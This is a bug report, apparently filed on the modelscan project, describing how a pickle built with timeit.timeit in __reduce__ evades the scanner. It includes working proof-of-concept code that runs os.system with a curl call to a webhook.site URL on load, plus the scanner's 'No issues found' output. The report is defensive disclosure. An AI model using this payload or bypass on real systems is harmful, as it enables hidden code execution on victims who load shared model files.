[BUG] Missing detection when calling built-in python library function timeit.timeit() #272
Description
Describe the bug
Using timeit.timeit() function, which is a built-in python library function to execute remote pickle file.
To Reproduce
Steps to reproduce the behavior:
- The attacker crafted a malicious pickle file using built-in python library function timeit.timeit()
import pickle
import timeit
class Payload(object):
def __reduce__(self):
return timeit.timeit, ('','import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')
def create_payload():
with open('payload.pickle', 'wb') as f:
pickle.dump(Payload(), f)
create_payload()
Then the attacker will send this pickle file to the victim computer and maybe the victim would load this pickle using pickle.load()
2. The victim will use modelscan library to check out if the received pickle file is malicious or not
modelscan -p payload.pickle ─╯
No settings file detected at /mnt/e/Stuff or sth like that/picklescan/modelscan-settings.toml. Using defaults.
Scanning /mnt/e/Stuff or sth like that/picklescan/payload.pickle using modelscan.scanners.PickleUnsafeOpScan model scan
--- Summary ---
No issues found!
- Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command)
import pickle
def load_payload():
with open('payload.pickle', 'rb') as f:
pickle.load(f)
load_payload()
Expected behavior
If the victim load this malicious pickle file without being detected by modelscan, it will execute arbitrary OS commands such as curl command.
Environment (please complete the following information):
- OS : Ubuntu 22.04
- Modelscan Version: 0.8.5
- Describe the model serialization format that triggered this error (if applicable): pickle
Additional context
I suggest putting timeit library into unsafe global function.